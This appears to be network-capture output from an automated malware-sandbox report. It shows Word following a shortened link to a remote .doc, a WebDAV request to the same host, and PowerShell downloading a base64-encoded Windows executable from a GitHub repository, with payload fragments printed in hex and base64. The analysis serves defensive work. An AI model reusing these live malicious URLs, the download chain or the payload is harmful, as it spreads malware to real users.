                                                                                                                                                                    2024-10-07 12:53:00 UTC7968INData Raw: 33 37 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 73 61 76 65 64 20 66 72 6f 6d 20 75 72 6c 3d 28 30 30 34 32 29 23 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 20 73 69 7a 65 73 20 63 75 73 74 6f 6d 65 6c 65 6d 65 6e 74 73 20 68 69 73 74 6f 72 79 20 70 6f 69 6e 74 65 72 65 76 65 6e 74 73 20 70 6f 73 74 6d 65 73 73 61 67 65 20 77 65 62 67 6c 20 77 65 62 73 6f 63 6b 65 74 73 20 63 73 73 61 6e 69 6d 61 74 69 6f 6e 73 20 63 73 73 63 6f 6c 75 6d 6e 73 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 77 69 64 74 68 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 73 70 61 6e 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 66 69 6c 6c 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 67 61 70 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 72 75 6c 65 20
                                                                                                                                                                    Data Ascii: 3750<!DOCTYPE html>... saved from url=(0042)# --><html lang="en" class=" sizes customelements history pointerevents postmessage webgl websockets cssanimations csscolumns csscolumns-width csscolumns-span csscolumns-fill csscolumns-gap csscolumns-rule
                                                                                                                                                                    2024-10-07 12:53:00 UTC6198INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 65 72 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 65 72 2d 74 69 74 6c 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 33 38 2c 38 32 32 20 20 20 20 3c 2f 73 70 61 6e 3e 2b 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 68 6f 72 74 65 6e 65 64 20 6c 69 6e 6b 73 20 69 6e 20 74 6f 74 61 6c 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                    Data Ascii: <div class="counter-item"> <h2 class="counter-title"><span class="counter"> 38,822 </span>+</h2> <p>Shortened links in total</p>
                                                                                                                                                                    2024-10-07 12:53:00 UTC2INData Raw: 0d 0a
                                                                                                                                                                    Data Ascii:
                                                                                                                                                                    2024-10-07 12:53:00 UTC664INData Raw: 32 38 63 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 6d 6f 64 65 72 6e 69 7a 72 2d 33 2e 36 2e 30 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 70 6c 75 67 69 6e 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 77 6f 77 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74
                                                                                                                                                                    Data Ascii: 28c<script src="assets/js/jquery-3.3.1.min.js"></script><script src="assets/js/modernizr-3.6.0.min.js"></script><script src="assets/js/plugins.js"></script><script src="assets/js/bootstrap.min.js"></script><script src="assets/js/wow.min.js"></script


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    6192.168.2.224917014.194.50.2114433616C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-10-07 12:53:01 UTC130OUTHEAD /d1a1 HTTP/1.1
                                                                                                                                                                    User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                    Host: m2g.me
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    2024-10-07 12:53:02 UTC388INHTTP/1.1 302 Found
                                                                                                                                                                    Date: Mon, 07 Oct 2024 12:53:02 GMT
                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                                    Connection: Upgrade, close
                                                                                                                                                                    Location: http://38.240.44.9/450/hun/nicesweetthingsentiretimesheneedtogetmebackwithverynicepersonwhowillingtogetniceworthfulthingsalwaysinhandsweetnesshaveforthebiscoutwhichieatedwith____veryniceenitertime.doc
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                    7192.168.2.224917314.194.50.211443
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-10-07 12:53:10 UTC153OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6d 32 67 2e 6d 65 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: m2g.me
                                                                                                                                                                    2024-10-07 12:53:11 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Mon, 07 Oct 2024 12:53:11 GMT
                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                                    Connection: Upgrade, close
                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    2024-10-07 12:53:11 UTC7968INData Raw: 33 37 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 73 61 76 65 64 20 66 72 6f 6d 20 75 72 6c 3d 28 30 30 34 32 29 23 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 20 73 69 7a 65 73 20 63 75 73 74 6f 6d 65 6c 65 6d 65 6e 74 73 20 68 69 73 74 6f 72 79 20 70 6f 69 6e 74 65 72 65 76 65 6e 74 73 20 70 6f 73 74 6d 65 73 73 61 67 65 20 77 65 62 67 6c 20 77 65 62 73 6f 63 6b 65 74 73 20 63 73 73 61 6e 69 6d 61 74 69 6f 6e 73 20 63 73 73 63 6f 6c 75 6d 6e 73 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 77 69 64 74 68 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 73 70 61 6e 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 66 69 6c 6c 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 67 61 70 20 63 73 73 63 6f 6c 75 6d 6e 73 2d 72 75 6c 65 20
                                                                                                                                                                    Data Ascii: 3750<!DOCTYPE html>... saved from url=(0042)# --><html lang="en" class=" sizes customelements history pointerevents postmessage webgl websockets cssanimations csscolumns csscolumns-width csscolumns-span csscolumns-fill csscolumns-gap csscolumns-rule
                                                                                                                                                                    2024-10-07 12:53:11 UTC6198INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 65 72 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 65 72 2d 74 69 74 6c 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 33 38 2c 38 32 33 20 20 20 20 3c 2f 73 70 61 6e 3e 2b 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 68 6f 72 74 65 6e 65 64 20 6c 69 6e 6b 73 20 69 6e 20 74 6f 74 61 6c 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                    Data Ascii: <div class="counter-item"> <h2 class="counter-title"><span class="counter"> 38,823 </span>+</h2> <p>Shortened links in total</p>
                                                                                                                                                                    2024-10-07 12:53:11 UTC2INData Raw: 0d 0a
                                                                                                                                                                    Data Ascii:
                                                                                                                                                                    2024-10-07 12:53:11 UTC664INData Raw: 32 38 63 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 6d 6f 64 65 72 6e 69 7a 72 2d 33 2e 36 2e 30 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 70 6c 75 67 69 6e 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 61 73 73 65 74 73 2f 6a 73 2f 77 6f 77 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74
                                                                                                                                                                    Data Ascii: 28c<script src="assets/js/jquery-3.3.1.min.js"></script><script src="assets/js/modernizr-3.6.0.min.js"></script><script src="assets/js/plugins.js"></script><script src="assets/js/bootstrap.min.js"></script><script src="assets/js/wow.min.js"></script


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    8192.168.2.2249174185.199.111.1334432880C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-10-07 12:53:10 UTC128OUTGET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1
                                                                                                                                                                    Host: raw.githubusercontent.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    2024-10-07 12:53:11 UTC902INHTTP/1.1 200 OK
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Length: 2935468
                                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                    ETag: "df9ff7aedbae4b4f50e2ae3a8f13fd0b84c66fbd35e7ac0df91a7a47b720c032"
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                    X-GitHub-Request-Id: C152:36BD6F:195809:1AFA8B:6703D986
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Date: Mon, 07 Oct 2024 12:53:10 GMT
                                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                                    X-Served-By: cache-ewr-kewr1740045-EWR
                                                                                                                                                                    X-Cache: HIT
                                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                                    X-Timer: S1728305591.969652,VS0,VE5
                                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                    X-Fastly-Request-ID: d36f6c4dc02078e90f6826c16520e101bbcc52b3
                                                                                                                                                                    Expires: Mon, 07 Oct 2024 12:58:10 GMT
                                                                                                                                                                    Source-Age: 47
                                                                                                                                                                    2024-10-07 12:53:11 UTC1378INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 41 4f 50 39 57 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 4a 41 68 41 41 41 47 41 41 41 41 41 41 41 41 33 71 38 68 41 41 41 67 41 41 41 41 77 43 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                                                                                                                                    Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAOP9WYAAAAAAAAAAOAADiELATAAAJAhAAAGAAAAAAAA3q8hAAAgAAAAwCEAAABAAAAgAAAAAgA
                                                                                                                                                                    2024-10-07 12:53:11 UTC1378INData Raw: 41 41 42 67 41 41 41 44 67 41 41 41 41 41 4b 67 49 44 66 51 55 41 41 41 51 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 41 51 41 41 51 35 30 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 6a 48 2f 2f 2f 2f 41 45 59 6f 45 67 41 41 42 67 49 6f 43 51 41 41 42 69 67 42 41 41 41 4b 4b 67 41 41 45 7a 41 44 41 47 30 41 41 41 41 42 41 41 41 52 49 41 45 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 49 41 41 41 41 46 41 41 41 41 47 51 41 41 41 44 67 41 41 41 41 41 41 69 67 55 41 41 41 47 41 32 38 46 41 41 41 47 4b 42 55 41 41 41 59 71 46 69 6f 43 4b 42 4d 41 41 41 59 44 4b 42 4d 41 41 41 59 6f 41 67 41 41 43 6a 6e 6f 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 75 45 41 41 45 4f 72 44 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 70 66 2f 2f 2f
                                                                                                                                                                    Data Ascii: AABgAAADgAAAAAKgIDfQUAAAQgAAAAAH6EEAAEe0AQAAQ50v///yYgAAAAADjH////AEYoEgAABgIoCQAABigBAAAKKgAAEzADAG0AAAABAAARIAEAAAD+DgAAOAAAAAD+DAAARQIAAAAFAAAAGQAAADgAAAAAAigUAAAGA28FAAAGKBUAAAYqFioCKBMAAAYDKBMAAAYoAgAACjno////IAAAAAB+hBAABHsuEAAEOrD///8mIAAAAAA4pf///
                                                                                                                                                                    2024-10-07 12:53:11 UTC1378INData Raw: 49 41 45 41 41 41 41 34 6d 66 2f 2f 2f 77 49 4f 42 48 30 4a 41 41 41 45 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 61 45 41 41 45 4f 58 33 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 63 76 2f 2f 2f 7a 49 43 4b 42 6b 41 41 41 59 6f 4a 77 41 41 42 69 6f 41 41 41 41 54 4d 41 4d 41 6b 51 41 41 41 41 4d 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 42 41 41 41 41 41 59 41 41 41 41 46 41 41 41 41 4c 41 41 41 41 46 49 41 41 41 41 34 41 51 41 41 41 43 6f 52 41 53 67 6b 41 41 41 47 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 2f 45 41 41 45 4f 73 72 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 76 2f 2f 2f 2f 78 45 42 4f 64 4c 2f 2f 2f 38 67 41 41 41 41 41 48 36 45 45 41 41 45 65 33 77 51 41 41 51 36 70 50 2f 2f 2f 79 59 67 41 41 41
                                                                                                                                                                    Data Ascii: IAEAAAA4mf///wIOBH0JAAAEIAAAAAB+hBAABHtaEAAEOX3///8mIAAAAAA4cv///zICKBkAAAYoJwAABioAAAATMAMAkQAAAAMAABEgAwAAAP4OAAA4AAAAAP4MAABFBAAAAAYAAAAFAAAALAAAAFIAAAA4AQAAACoRASgkAAAGIAAAAAB+hBAABHs/EAAEOsr///8mIAEAAAA4v////xEBOdL///8gAAAAAH6EEAAEe3wQAAQ6pP///yYgAAA
                                                                                                                                                                    2024-10-07 12:53:11 UTC1378INData Raw: 45 67 41 41 41 41 41 48 36 45 45 41 41 45 65 79 49 51 41 41 51 36 53 66 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 2b 2f 2f 2f 2f 45 51 51 6f 4f 51 41 41 42 6a 72 4d 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 6d 45 41 41 45 4f 68 37 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 45 2f 2f 2f 2f 39 33 45 2f 76 2f 2f 45 51 51 36 58 51 41 41 41 43 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 69 68 41 41 42 44 6b 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 55 41 52 51 4d 41 41 41 41 46 41 41 41 41 4b 51 41 41 41 44 6f 41 41 41 41 34 41 41 41 41 41 44 67 77 41 41 41 41 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 73 6f 45 41 41 45 4f 74 48 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 78 76 2f 2f 2f 78 45 45 4b 44 6f 41 41 41 59 67 41 67 41 41 41
                                                                                                                                                                    Data Ascii: EgAAAAAH6EEAAEeyIQAAQ6Sf///yYgBAAAADg+////EQQoOQAABjrM////IAAAAAB+hBAABHtmEAAEOh7///8mIAAAAAA4E////93E/v//EQQ6XQAAACAAAAAAfoQQAAR7ihAABDkPAAAAJiAAAAAAOAQAAAD+DAUARQMAAAAFAAAAKQAAADoAAAA4AAAAADgwAAAAIAEAAAB+hBAABHsoEAAEOtH///8mIAEAAAA4xv///xEEKDoAAAYgAgAAA
                                                                                                                                                                    2024-10-07 12:53:11 UTC1378INData Raw: 4f 4a 50 2f 2f 2f 38 43 46 48 30 51 41 41 41 45 49 41 55 41 41 41 41 34 67 76 2f 2f 2f 77 4a 37 45 41 41 41 42 43 67 45 41 41 41 72 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 74 63 45 41 41 45 4f 6d 50 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 57 50 2f 2f 2f 79 6f 71 41 6e 73 50 41 41 41 45 4b 41 55 41 41 43 73 67 41 41 41 41 41 48 36 45 45 41 41 45 65 78 6b 51 41 41 51 35 4e 2f 2f 2f 2f 79 59 67 41 41 41 41 41 44 67 73 2f 2f 2f 2f 41 41 41 6d 66 68 45 41 41 41 51 55 2f 67 45 71 41 41 41 61 66 68 45 41 41 41 51 71 41 43 72 2b 43 51 41 41 62 77 30 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 77 63 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 31 30 41 41 41 59 71 41 44 34 41 2f 67 6b 41 41 50 34 4a 41 51 41 6f 62 77 41 41 42 69 6f 36 2f 67 6b 41 41 50 34 4a 41 51 42
                                                                                                                                                                    Data Ascii: OJP///8CFH0QAAAEIAUAAAA4gv///wJ7EAAABCgEAAArIAEAAAB+hBAABHtcEAAEOmP///8mIAEAAAA4WP///yoqAnsPAAAEKAUAACsgAAAAAH6EEAAEexkQAAQ5N////yYgAAAAADgs////AAAmfhEAAAQU/gEqAAAafhEAAAQqACr+CQAAbw0AAAoqACr+CQAAbwcAAAoqACr+CQAAb10AAAYqAD4A/gkAAP4JAQAobwAABio6/gkAAP4JAQB
                                                                                                                                                                    2024-10-07 12:53:11 UTC1378INData Raw: 67 41 41 41 5a 7a 45 41 41 41 43 6e 4d 52 41 41 41 4b 66 52 41 41 41 41 51 67 41 67 41 41 41 48 36 45 45 41 41 45 65 32 34 51 41 41 51 35 41 50 37 2f 2f 79 59 67 48 51 41 41 41 44 6a 31 2f 66 2f 2f 41 78 38 51 4b 4e 45 43 41 41 59 35 4a 41 49 41 41 43 41 4f 41 41 41 41 66 6f 51 51 41 41 52 37 4a 68 41 41 42 44 6e 55 2f 66 2f 2f 4a 69 41 44 41 41 41 41 4f 4d 6e 39 2f 2f 38 43 65 78 59 41 41 41 51 52 42 68 45 48 49 50 2f 2f 2f 33 39 66 63 31 67 41 41 41 5a 76 45 67 41 41 43 69 41 52 41 41 41 41 66 6f 51 51 41 41 52 37 55 78 41 41 42 44 71 62 2f 66 2f 2f 4a 69 41 61 41 41 41 41 4f 4a 44 39 2f 2f 38 43 63 78 4d 41 41 41 70 39 46 67 41 41 42 43 41 48 41 41 41 41 4f 48 76 39 2f 2f 38 52 42 79 41 41 41 41 43 41 58 7a 6c 4a 41 51 41 41 49 41 55 41 41 41 41 34 5a
                                                                                                                                                                    Data Ascii: gAAAZzEAAACnMRAAAKfRAAAAQgAgAAAH6EEAAEe24QAAQ5AP7//yYgHQAAADj1/f//Ax8QKNECAAY5JAIAACAOAAAAfoQQAAR7JhAABDnU/f//JiADAAAAOMn9//8CexYAAAQRBhEHIP///39fc1gAAAZvEgAACiARAAAAfoQQAAR7UxAABDqb/f//JiAaAAAAOJD9//8CcxMAAAp9FgAABCAHAAAAOHv9//8RByAAAACAXzlJAQAAIAUAAAA4Z
                                                                                                                                                                    2024-10-07 12:53:11 UTC1378INData Raw: 41 41 42 2b 68 42 41 41 42 48 73 78 45 41 41 45 4f 6b 6a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 50 66 2f 2f 2f 7a 6a 53 2f 2f 2f 2f 49 41 55 41 41 41 41 34 4c 76 2f 2f 2f 77 41 6f 55 67 41 41 42 68 45 42 4b 46 4d 41 41 41 59 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 5a 78 41 41 42 44 6f 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 49 41 52 51 45 41 41 41 41 46 41 41 41 41 4f 41 41 41 41 41 44 64 5a 77 41 41 41 43 59 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 73 51 41 41 51 36 44 77 41 41 41 43 59 67 41 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 41 41 45 55 43 41 41 41 41 42 51 41 41 41 43 63 41 41 41 41 34 41 41 41 41 41 42 51 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 67 68 41 41 42 44 72 58 2f 2f 2f 2f 4a 69 41
                                                                                                                                                                    Data Ascii: AAB+hBAABHsxEAAEOkj///8mIAAAAAA4Pf///zjS////IAUAAAA4Lv///wAoUgAABhEBKFMAAAYTBSAAAAAAfoQQAAR7ZxAABDoPAAAAJiAAAAAAOAQAAAD+DAIARQEAAAAFAAAAOAAAAADdZwAAACYgAAAAAH6EEAAEe0sQAAQ6DwAAACYgAAAAADgEAAAA/gwAAEUCAAAABQAAACcAAAA4AAAAABQTBSAAAAAAfoQQAAR7ghAABDrX////JiA
                                                                                                                                                                    2024-10-07 12:53:11 UTC1378INData Raw: 59 67 43 41 41 41 41 44 67 4a 2f 76 2f 2f 45 51 45 6f 53 77 41 41 42 68 4d 48 49 41 73 41 41 41 41 34 39 76 33 2f 2f 78 45 4a 4b 68 45 41 65 78 67 41 41 41 51 6f 56 77 41 41 42 6e 4d 67 41 41 41 47 45 77 6b 67 42 67 41 41 41 44 6a 57 2f 66 2f 2f 4f 4e 37 2f 2f 2f 38 67 44 41 41 41 41 48 36 45 45 41 41 45 65 7a 38 51 41 41 51 36 76 66 33 2f 2f 79 59 67 44 67 41 41 41 44 69 79 2f 66 2f 2f 41 6e 73 54 41 41 41 45 45 51 51 52 42 53 68 57 41 41 41 47 45 77 67 67 42 77 41 41 41 44 69 58 2f 66 2f 2f 41 42 4d 77 41 77 42 39 41 41 41 41 41 51 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 57 51 41 41 41 41 55 41 41 41 41 76 41 41 41 41 4f 46 51 41 41 41 41 43 63 77 34 41 41 41 70 39 45 41 41 41 42 43 41 41 41
                                                                                                                                                                    Data Ascii: YgCAAAADgJ/v//EQEoSwAABhMHIAsAAAA49v3//xEJKhEAexgAAAQoVwAABnMgAAAGEwkgBgAAADjW/f//ON7///8gDAAAAH6EEAAEez8QAAQ6vf3//yYgDgAAADiy/f//AnsTAAAEEQQRBShWAAAGEwggBwAAADiX/f//ABMwAwB9AAAAAQAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAAWQAAAAUAAAAvAAAAOFQAAAACcw4AAAp9EAAABCAAA
                                                                                                                                                                    2024-10-07 12:53:11 UTC1378INData Raw: 42 68 62 2b 42 43 6f 41 41 41 41 2b 44 77 41 44 4b 48 45 41 41 41 59 57 2f 67 49 57 2f 67 45 71 4d 67 38 41 41 79 68 78 41 41 41 47 46 76 34 43 4b 67 41 41 41 44 34 50 41 41 4d 6f 63 51 41 41 42 68 62 2b 42 42 62 2b 41 53 6f 6d 44 77 41 44 4b 48 49 41 41 41 59 71 41 41 41 79 44 77 41 44 4b 48 49 41 41 41 59 57 2f 67 45 71 41 41 41 41 45 7a 41 44 41 41 6f 42 41 41 41 4b 41 41 41 52 49 41 51 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 55 41 41 41 43 4b 41 41 41 41 73 51 41 41 41 41 55 41 41 41 42 67 41 41 41 41 4c 77 41 41 41 44 69 46 41 41 41 41 45 67 45 44 65 78 30 41 41 41 51 6f 48 51 41 41 43 69 6f 43 65 78 34 41 41 41 52 76 48 67 41 41 43 67 4e 37 48 67 41 41 42 43 68 34 41 41 41 47 62 78 38 41 41 41 6f 71 41 69 68 6a 41 41 41
                                                                                                                                                                    Data Ascii: Bhb+BCoAAAA+DwADKHEAAAYW/gIW/gEqMg8AAyhxAAAGFv4CKgAAAD4PAAMocQAABhb+BBb+ASomDwADKHIAAAYqAAAyDwADKHIAAAYW/gEqAAAAEzADAAoBAAAKAAARIAQAAAD+DgAAOAAAAAD+DAAARQUAAACKAAAAsQAAAAUAAABgAAAALwAAADiFAAAAEgEDex0AAAQoHQAACioCex4AAARvHgAACgN7HgAABCh4AAAGbx8AAAoqAihjAAA
